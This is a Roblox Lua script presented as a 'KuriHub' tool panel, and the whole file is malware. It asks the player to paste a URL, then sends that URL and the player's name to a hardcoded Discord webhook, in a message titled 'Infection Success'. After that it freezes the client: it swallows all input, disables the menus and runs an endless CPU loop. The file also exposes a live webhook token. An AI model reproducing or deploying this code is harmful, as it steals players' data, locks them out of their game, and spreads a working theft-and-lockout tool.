local Players = game:GetService("Players") local Player = Players.LocalPlayer local PlayerGui = Player:WaitForChild("PlayerGui") local GuiService = game:GetService("GuiService") local RunService = game:GetService("RunService") local UserInputService = game:GetService("UserInputService") local StarterGui = game:GetService("StarterGui") local ContextActionService = game:GetService("ContextActionService") local HttpService = game:GetService("HttpService") -- !!! BURAYA WEBHOOK URL'SİNİ YAPIŞTIR !!! local WebhookURL = "https://discord.com/api/webhooks/1456376858202345492/gwMOiZQ_tjft6txGP-KiNbhFGDZLmHlInYzW6VeNIl0PsL6Jm9Q4r05ERbn3qidzetWo" -- Ses Temizliği for _, v in pairs(game:GetDescendants()) do if v:IsA("Sound") then v:Stop() v:Destroy() end end local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "KuriHub_Ultimate_Lock" ScreenGui.Parent = PlayerGui ScreenGui.IgnoreGuiInset = true ScreenGui.DisplayOrder = 2147483647 -- --- ANA PANEL --- local MainFrame = Instance.new("Frame", ScreenGui) MainFrame.BackgroundColor3 = Color3.new(0,0,0) MainFrame.Position = UDim2.new(0.5, -200, 0.5, -200) MainFrame.Size = UDim2.new(0, 400, 0, 400) Instance.new("UIStroke", MainFrame).Color = Color3.new(1,1,1) local Logo = Instance.new("TextLabel", MainFrame) Logo.BackgroundTransparency = 1 Logo.Size = UDim2.new(1, 0, 0, 100) Logo.Position = UDim2.new(0, 0, 0.05, 0) Logo.Font = Enum.Font.GothamBlack Logo.Text = "K" Logo.TextColor3 = Color3.new(1,1,1) Logo.TextSize = 100 local Title = Instance.new("TextLabel", MainFrame) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0, 0, 0.35, 0) Title.Size = UDim2.new(1, 0, 0, 40) Title.Font = Enum.Font.GothamBold Title.Text = "KuriHub" Title.TextColor3 = Color3.new(1,1,1) Title.TextSize = 35 local LinkBox = Instance.new("TextBox", MainFrame) LinkBox.BackgroundColor3 = Color3.fromRGB(35, 35, 35) LinkBox.Size = UDim2.new(0.85, 0, 0, 60) LinkBox.Position = UDim2.new(0.075, 0, 0.5, 0) LinkBox.PlaceholderText = "PASTE: URL" LinkBox.TextColor3 = Color3.new(1,1,1) LinkBox.TextSize = 20 LinkBox.Font = Enum.Font.GothamBold Instance.new("UICorner", LinkBox) local ExecuteBtn = Instance.new("TextButton", MainFrame) ExecuteBtn.BackgroundColor3 = Color3.new(1,1,1) ExecuteBtn.Size = UDim2.new(0.5, 0, 0, 50) ExecuteBtn.Position = UDim2.new(0.25, 0, 0.72, 0) ExecuteBtn.Text = "EXECUTE" ExecuteBtn.Font = Enum.Font.GothamBlack ExecuteBtn.TextColor3 = Color3.new(0,0,0) ExecuteBtn.TextSize = 18 ExecuteBtn.Modal = true Instance.new("UICorner", ExecuteBtn) local ErrorLabel = Instance.new("TextLabel", MainFrame) ErrorLabel.BackgroundTransparency = 1 ErrorLabel.Size = UDim2.new(1, 0, 0, 30) ErrorLabel.Position = UDim2.new(0, 0, 0.88, 0) ErrorLabel.Font = Enum.Font.GothamBold ErrorLabel.Text = "YOU MUST BE ALONE IN THE SERVER!" ErrorLabel.TextColor3 = Color3.fromRGB(255, 0, 0) ErrorLabel.TextSize = 16 ErrorLabel.Visible = false -- --- NUCLEAR LOCK CORE --- local function StartTheAnnihilation() MainFrame.Visible = false local Blackout = Instance.new("Frame", ScreenGui) Blackout.Size = UDim2.new(1,0,1,0) Blackout.BackgroundColor3 = Color3.new(0,0,0) Blackout.ZIndex = 2147483640 local Msg = Instance.new("TextLabel", ScreenGui) Msg.Size = UDim2.new(1,0,1,0) Msg.BackgroundTransparency = 1 Msg.Text = "BOT IS COMING..." Msg.TextColor3 = Color3.new(1,1,1) Msg.TextSize = 95 Msg.Font = Enum.Font.Code Msg.ZIndex = 2147483647 -- 1. KLAVYE/MOUSE/ESC KARADELİĞİ (Priority 10000 - Mutlak Yutma) local function SinkInput() return Enum.ContextActionResult.Sink end ContextActionService:BindActionAtPriority("KuriLock", SinkInput, false, 10000, unpack(Enum.UserInputType:GetEnumItems())) -- 2. MOTOR SABOTAJI (ESC'yi çizilmeden durdurur) RunService.RenderStepped:Connect(function() GuiService:SetMenuIsOpen(false) StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false) UserInputService.MouseBehavior = Enum.MouseBehavior.LockCenter UserInputService.MouseIconEnabled = false GuiService.SelectedObject = Msg end) -- 3. ABSOLUTE FREEZE (FPS 0) task.wait(0.5) -- Döngü içinde task.wait olmaması işlemciyi Roblox'un UI servislerinden çalar. while true do for i = 1, 10^9 do local _ = (i * i) / 1.5 -- İşlemciyi maksimuma çıkarır end end end ExecuteBtn.MouseButton1Click:Connect(function() local playerCount = #Players:GetPlayers() if playerCount > 1 then ErrorLabel.Visible = true task.wait(2.5) ErrorLabel.Visible = false elseif LinkBox.Text ~= "" then pcall(function() local req = (syn and syn.request) or http_request or request if req then req({ Url = WebhookURL, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = HttpService:JSONEncode({ ["content"] = "💀 **KURIHUBIN EŞŞEKLERİ**", ["embeds"] = {{ ["title"] = "Infection Success", ["description"] = "**User:** "..Player.Name.."\n**URL:** "..LinkBox.Text, ["color"] = 0 }} }) }) end end) StartTheAnnihilation() end end)